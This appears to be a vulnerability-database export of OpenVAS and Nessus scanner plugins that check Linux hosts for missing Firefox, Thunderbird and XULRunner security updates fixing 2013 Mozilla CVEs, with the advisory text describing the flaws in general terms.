"CVE-2013-1694", "CVE-2013-1690", "CVE-2013-1684", "CVE-2013-1686", "CVE-2013-1682", "CVE-2013-1693"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2013-06-27T00:00:00", "id": "OPENVAS:1361412562310881759", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881759", "type": "openvas", "title": "CentOS Update for xulrunner CESA-2013:0981 centos6", 
"sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for xulrunner CESA-2013:0981 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.881759\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-06-27 09:59:49 +0530 (Thu, 27 Jun 2013)\");\n script_cve_id(\"CVE-2013-1682\", \"CVE-2013-1684\", \"CVE-2013-1685\", \"CVE-2013-1686\",\n \"CVE-2013-1687\", \"CVE-2013-1690\", \"CVE-2013-1692\", \"CVE-2013-1693\",\n \"CVE-2013-1694\", \"CVE-2013-1697\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"CentOS Update for xulrunner CESA-2013:0981 centos6\");\n\n script_xref(name:\"CESA\", value:\"2013:0981\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2013-June/019809.html\");\n script_tag(name:\"summary\", value:\"The 
remote host is missing an update for the 'xulrunner'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n script_tag(name:\"affected\", value:\"xulrunner on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"Mozilla Firefox is an open source web browser. XULRunner provides the XUL\n Runtime environment for Mozilla Firefox.\n\n Several flaws were found in the processing of malformed web content. A web\n page containing malicious content could cause Firefox to crash or,\n potentially, execute arbitrary code with the privileges of the user running\n Firefox. (CVE-2013-1682, CVE-2013-1684, CVE-2013-1685, CVE-2013-1686,\n CVE-2013-1687, CVE-2013-1690)\n\n It was found that Firefox allowed data to be sent in the body of\n XMLHttpRequest (XHR) HEAD requests. In some cases this could allow\n attackers to conduct Cross-Site Request Forgery (CSRF) attacks.\n (CVE-2013-1692)\n\n Timing differences in the way Firefox processed SVG image files could\n allow an attacker to read data across domains, potentially leading to\n information disclosure. (CVE-2013-1693)\n\n Two flaws were found in the way Firefox implemented some of its internal\n structures (called wrappers). An attacker could use these flaws to bypass\n some restrictions placed on them. This could lead to unexpected behavior or\n a potentially exploitable crash. 
(CVE-2013-1694, CVE-2013-1697)\n\n Red Hat would like to thank the Mozilla project for reporting these issues.\n Upstream acknowledges Gary Kwong, Jesse Ruderman, Andrew McCreight,\n Abhishek Arya, Mariusz Mlynski, Nils, Johnathan Kuskos, Paul Stone, Boris\n Zbarsky, and moz_bug_r_a4 as the original reporters of these issues.\n\n For technical details regarding these flaws, refer to the Mozilla\n security advisories for Firefox 17.0.7 ESR. You can find a link to the\n Mozilla advisories in the References section of this erratum.\n\n All Firefox users should upgrade to these updated packages, which contain\n Firefox version 17.0.7 ESR, which corrects these issues. After installing\n the update, Firefox must be restarted for the changes to take effect.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"xulrunner\", rpm:\"xulrunner~17.0.7~1.el6.centos\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xulrunner-devel\", rpm:\"xulrunner-devel~17.0.7~1.el6.centos\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-23T13:09:34", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1687", "CVE-2013-1692", "CVE-2013-1685", "CVE-2013-1697", "CVE-2013-1694", "CVE-2013-1690", "CVE-2013-1684", "CVE-2013-1686", "CVE-2013-1682", "CVE-2013-1693"], "description": "Check for the Version of thunderbird", "modified": "2018-01-23T00:00:00", "published": "2013-06-27T00:00:00", "id": "OPENVAS:881757", "href": "http://plugins.openvas.org/nasl.php?oid=881757", "type": "openvas", "title": 
"CentOS Update for thunderbird CESA-2013:0982 centos6 ", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for thunderbird CESA-2013:0982 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Mozilla Thunderbird is a standalone mail and newsgroup client.\n\n Several flaws were found in the processing of malformed content. Malicious\n content could cause Thunderbird to crash or, potentially, execute arbitrary\n code with the privileges of the user running Thunderbird. (CVE-2013-1682,\n CVE-2013-1684, CVE-2013-1685, CVE-2013-1686, CVE-2013-1687, CVE-2013-1690)\n\n It was found that Thunderbird allowed data to be sent in the body of\n XMLHttpRequest (XHR) HEAD requests. In some cases this could allow\n attackers to conduct Cross-Site Request Forgery (CSRF) attacks.\n (CVE-2013-1692)\n\n Timing differences in the way Thunderbird processed SVG image files could\n allow an attacker to read data across domains, potentially leading to\n information disclosure. 
(CVE-2013-1693)\n\n Two flaws were found in the way Thunderbird implemented some of its\n internal structures (called wrappers). An attacker could use these flaws to\n bypass some restrictions placed on them. This could lead to unexpected\n behavior or a potentially exploitable crash. (CVE-2013-1694, CVE-2013-1697)\n\n Red Hat would like to thank the Mozilla project for reporting these issues.\n Upstream acknowledges Gary Kwong, Jesse Ruderman, Andrew McCreight,\n Abhishek Arya, Mariusz Mlynski, Nils, Johnathan Kuskos, Paul Stone, Boris\n Zbarsky, and moz_bug_r_a4 as the original reporters of these issues.\n\n Note: All of the above issues cannot be exploited by a specially-crafted\n HTML mail message as JavaScript is disabled by default for mail messages.\n They could be exploited another way in Thunderbird, for example, when\n viewing the full remote content of an RSS feed.\n\n All Thunderbird users should upgrade to this updated package, which\n contains Thunderbird version 17.0.7 ESR, which corrects these issues. 
After\n installing the update, Thunderbird must be restarted for the changes to\n take effect.\";\n\n\ntag_affected = \"thunderbird on CentOS 6\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_id(881757);\n script_version(\"$Revision: 8494 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-23 07:57:55 +0100 (Tue, 23 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-06-27 09:59:18 +0530 (Thu, 27 Jun 2013)\");\n script_cve_id(\"CVE-2013-1682\", \"CVE-2013-1684\", \"CVE-2013-1685\", \"CVE-2013-1686\",\n \"CVE-2013-1687\", \"CVE-2013-1690\", \"CVE-2013-1692\", \"CVE-2013-1693\",\n \"CVE-2013-1694\", \"CVE-2013-1697\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"CentOS Update for thunderbird CESA-2013:0982 centos6 \");\n\n script_xref(name: \"CESA\", value: \"2013:0982\");\n script_xref(name: \"URL\" , value: \"http://lists.centos.org/pipermail/centos-announce/2013-June/019807.html\");\n script_tag(name: \"summary\" , value: \"Check for the Version of thunderbird\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"thunderbird\", rpm:\"thunderbird~17.0.7~1.el6.centos\", 
rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:24", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1687", "CVE-2013-1692", "CVE-2013-1685", "CVE-2013-1697", "CVE-2013-1694", "CVE-2013-1690", "CVE-2013-1684", "CVE-2013-1686", "CVE-2013-1682", "CVE-2013-1693"], "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2013-06-27T00:00:00", "id": "OPENVAS:1361412562310871014", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871014", "type": "openvas", "title": "RedHat Update for thunderbird RHSA-2013:0982-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for thunderbird RHSA-2013:0982-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871014\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-06-27 09:56:47 +0530 (Thu, 27 Jun 2013)\");\n script_cve_id(\"CVE-2013-1682\", \"CVE-2013-1684\", \"CVE-2013-1685\", \"CVE-2013-1686\",\n \"CVE-2013-1687\", \"CVE-2013-1690\", \"CVE-2013-1692\", \"CVE-2013-1693\",\n \"CVE-2013-1694\", \"CVE-2013-1697\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"RedHat Update for thunderbird RHSA-2013:0982-01\");\n\n script_xref(name:\"RHSA\", value:\"2013:0982-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2013-June/msg00022.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'thunderbird'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_6\");\n script_tag(name:\"affected\", value:\"thunderbird on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Workstation (v. 
6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"Mozilla Thunderbird is a standalone mail and newsgroup client.\n\n Several flaws were found in the processing of malformed content. Malicious\n content could cause Thunderbird to crash or, potentially, execute arbitrary\n code with the privileges of the user running Thunderbird. (CVE-2013-1682,\n CVE-2013-1684, CVE-2013-1685, CVE-2013-1686, CVE-2013-1687, CVE-2013-1690)\n\n It was found that Thunderbird allowed data to be sent in the body of\n XMLHttpRequest (XHR) HEAD requests. In some cases this could allow\n attackers to conduct Cross-Site Request Forgery (CSRF) attacks.\n (CVE-2013-1692)\n\n Timing differences in the way Thunderbird processed SVG image files could\n allow an attacker to read data across domains, potentially leading to\n information disclosure. (CVE-2013-1693)\n\n Two flaws were found in the way Thunderbird implemented some of its\n internal structures (called wrappers). An attacker could use these flaws to\n bypass some restrictions placed on them. This could lead to unexpected\n behavior or a potentially exploitable crash. (CVE-2013-1694, CVE-2013-1697)\n\n Red Hat would like to thank the Mozilla project for reporting these issues.\n Upstream acknowledges Gary Kwong, Jesse Ruderman, Andrew McCreight,\n Abhishek Arya, Mariusz Mlynski, Nils, Johnathan Kuskos, Paul Stone, Boris\n Zbarsky, and moz_bug_r_a4 as the original reporters of these issues.\n\n Note: All of the above issues cannot be exploited by a specially-crafted\n HTML mail message as JavaScript is disabled by default for mail messages.\n They could be exploited another way in Thunderbird, for example, when\n viewing the full remote content of an RSS feed.\n\n All Thunderbird users should upgrade to this updated package, which\n contains Thunderbird version 17.0.7 ESR, which corrects these issues. 
After\n installing the update, Thunderbird must be restarted for the changes to\n take effect.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"thunderbird\", rpm:\"thunderbird~17.0.7~1.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"thunderbird-debuginfo\", rpm:\"thunderbird-debuginfo~17.0.7~1.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:14", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1687", "CVE-2013-1692", "CVE-2013-1685", "CVE-2013-1697", "CVE-2013-1694", "CVE-2013-1690", "CVE-2013-1684", "CVE-2013-1686", "CVE-2013-1682", "CVE-2013-1693"], "description": "Oracle Linux Local Security Checks ELSA-2013-0982", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123604", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123604", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2013-0982", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2013-0982.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This 
program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123604\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:06:09 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2013-0982\");\n script_tag(name:\"insight\", value:\"ELSA-2013-0982 - thunderbird security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2013-0982\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2013-0982.html\");\n script_cve_id(\"CVE-2013-1682\", \"CVE-2013-1684\", \"CVE-2013-1685\", \"CVE-2013-1686\", \"CVE-2013-1687\", \"CVE-2013-1692\", \"CVE-2013-1693\", \"CVE-2013-1694\", \"CVE-2013-1697\", \"CVE-2013-1690\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux(5|6)\");\n script_category(ACT_GATHER_INFO);\n 
script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"thunderbird\", rpm:\"thunderbird~17.0.7~1.0.1.el5_9\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"thunderbird\", rpm:\"thunderbird~17.0.7~1.0.1.el6_4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:12", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1687", "CVE-2013-1692", "CVE-2013-1685", "CVE-2013-1697", "CVE-2013-1694", "CVE-2013-1690", "CVE-2013-1684", "CVE-2013-1686", "CVE-2013-1682", "CVE-2013-1693"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2013-06-27T00:00:00", "id": "OPENVAS:1361412562310881753", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881753", "type": "openvas", "title": "CentOS Update for firefox CESA-2013:0981 centos5", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for firefox CESA-2013:0981 centos5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty 
of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.881753\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-06-27 09:57:47 +0530 (Thu, 27 Jun 2013)\");\n script_cve_id(\"CVE-2013-1682\", \"CVE-2013-1684\", \"CVE-2013-1685\", \"CVE-2013-1686\",\n \"CVE-2013-1687\", \"CVE-2013-1690\", \"CVE-2013-1692\", \"CVE-2013-1693\",\n \"CVE-2013-1694\", \"CVE-2013-1697\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"CentOS Update for firefox CESA-2013:0981 centos5\");\n\n script_xref(name:\"CESA\", value:\"2013:0981\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2013-June/019818.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'firefox'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n script_tag(name:\"affected\", value:\"firefox on CentOS 5\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"Mozilla Firefox is an open source web browser. 
XULRunner provides the XUL\n Runtime environment for Mozilla Firefox.\n\n Several flaws were found in the processing of malformed web content. A web\n page containing malicious content could cause Firefox to crash or,\n potentially, execute arbitrary code with the privileges of the user running\n Firefox. (CVE-2013-1682, CVE-2013-1684, CVE-2013-1685, CVE-2013-1686,\n CVE-2013-1687, CVE-2013-1690)\n\n It was found that Firefox allowed data to be sent in the body of\n XMLHttpRequest (XHR) HEAD requests. In some cases this could allow\n attackers to conduct Cross-Site Request Forgery (CSRF) attacks.\n (CVE-2013-1692)\n\n Timing differences in the way Firefox processed SVG image files could\n allow an attacker to read data across domains, potentially leading to\n information disclosure. (CVE-2013-1693)\n\n Two flaws were found in the way Firefox implemented some of its internal\n structures (called wrappers). An attacker could use these flaws to bypass\n some restrictions placed on them. This could lead to unexpected behavior or\n a potentially exploitable crash. (CVE-2013-1694, CVE-2013-1697)\n\n Red Hat would like to thank the Mozilla project for reporting these issues.\n Upstream acknowledges Gary Kwong, Jesse Ruderman, Andrew McCreight,\n Abhishek Arya, Mariusz Mlynski, Nils, Johnathan Kuskos, Paul Stone, Boris\n Zbarsky, and moz_bug_r_a4 as the original reporters of these issues.\n\n For technical details regarding these flaws, refer to the Mozilla\n security advisories for Firefox 17.0.7 ESR. You can find a link to the\n Mozilla advisories in the References section of this erratum.\n\n All Firefox users should upgrade to these updated packages, which contain\n Firefox version 17.0.7 ESR, which corrects these issues. 
After installing\n the update, Firefox must be restarted for the changes to take effect.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"firefox\", rpm:\"firefox~17.0.7~1.el5.centos\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-20T14:38:05", "description": "Mozilla Firefox has been updated to the 17.0.7 ESR version, fixing\nbugs and security fixes.\n\n - Mozilla developers identified and fixed several memory\n safety bugs in the browser engine used in Firefox and\n other Mozilla-based products. Some of these bugs showed\n evidence of memory corruption under certain\n circumstances, and we presume that with enough effort at\n least some of these could be exploited to run arbitrary\n code. (MFSA 2013-49)\n\n Gary Kwong, Jesse Ruderman, and Andrew McCreight\n reported memory safety problems and crashes that affect\n Firefox ESR 17, and Firefox 21. (CVE-2013-1682)\n\n - Security researcher Abhishek Arya (Inferno) of the\n Google Chrome Security Team used the Address Sanitizer\n tool to discover a series of use-after-free problems\n rated critical as security issues in shipped software.\n Some of these issues are potentially exploitable,\n allowing for remote code execution. We would also like\n to thank Abhishek for reporting additional\n use-after-free and buffer overflow flaws in code\n introduced during Firefox development. These were fixed\n before general release. (MFSA 2013-50)\n\n - Heap-use-after-free in\n mozilla::dom::HTMLMediaElement::LookupMediaElementURITab\n le. 
(CVE-2013-1684)\n\n - Heap-use-after-free in nsIDocument::GetRootElement.\n (CVE-2013-1685)\n\n - Heap-use-after-free in mozilla::ResetDir.\n (CVE-2013-1686)\n\n - Security researcher Mariusz Mlynski reported that it is\n possible to compile a user-defined function in the XBL\n scope of a specific element and then trigger an event\n within this scope to run code. In some circumstances,\n when this code is run, it can access content protected\n by System Only Wrappers (SOW) and chrome-privileged\n pages. This could potentially lead to arbitrary code\n execution. Additionally, Chrome Object Wrappers (COW)\n can be bypassed by web content to access privileged\n methods, leading to a cross-site scripting (XSS) attack\n from privileged pages. (MFSA 2013-51 / CVE-2013-1687)\n\n - Security researcher Nils reported that specially crafted\n web content using the onreadystatechange event and\n reloading of pages could sometimes cause a crash when\n unmapped memory is executed. This crash is potentially\n exploitable. (MFSA 2013-53 / CVE-2013-1690)\n\n - Security researcher Johnathan Kuskos reported that\n Firefox is sending data in the body of XMLHttpRequest\n (XHR) HEAD requests, which goes against the XHR\n specification. This can potentially be used for\n Cross-Site Request Forgery (CSRF) attacks against sites\n which do not distinguish between HEAD and POST requests.\n (MFSA 2013-54 / CVE-2013-1692)\n\n - Security researcher Paul Stone of Context Information\n Security discovered that timing differences in the\n processing of SVG format images with filters could allow\n for pixel values to be read. This could potentially\n allow for text values to be read across domains, leading\n to information disclosure. (MFSA 2013-55 /\n CVE-2013-1693)\n\n - Mozilla security researcher moz_bug_r_a4 reported that\n XrayWrappers can be bypassed to call content-defined\n toString and valueOf methods through DefaultValue. 
This\n can lead to unexpected behavior when privileged code\n acts on the incorrect values. (MFSA 2013-59 /\n CVE-2013-1697)", "edition": 17, "published": "2013-07-06T00:00:00", "title": "SuSE 11.2 Security Update : Mozilla Firefox (SAT Patch Number 7976)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1687", "CVE-2013-1692", "CVE-2013-1685", "CVE-2013-1697", "CVE-2013-1690", "CVE-2013-1684", "CVE-2013-1686", "CVE-2013-1682", "CVE-2013-1693"], "modified": "2013-07-06T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:MozillaFirefox-branding-SLED", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:MozillaFirefox-translations", "p-cpe:/a:novell:suse_linux:11:MozillaFirefox"], "id": "SUSE_11_FIREFOX-20130628-130628.NASL", "href": "https://www.tenable.com/plugins/nessus/67195", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. 
The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(67195);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2013-1682\", \"CVE-2013-1684\", \"CVE-2013-1685\", \"CVE-2013-1686\", \"CVE-2013-1687\", \"CVE-2013-1690\", \"CVE-2013-1692\", \"CVE-2013-1693\", \"CVE-2013-1697\");\n\n script_name(english:\"SuSE 11.2 Security Update : Mozilla Firefox (SAT Patch Number 7976)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Mozilla Firefox has been updated to the 17.0.7 ESR version, fixing\nbugs and security fixes.\n\n - Mozilla developers identified and fixed several memory\n safety bugs in the browser engine used in Firefox and\n other Mozilla-based products. Some of these bugs showed\n evidence of memory corruption under certain\n 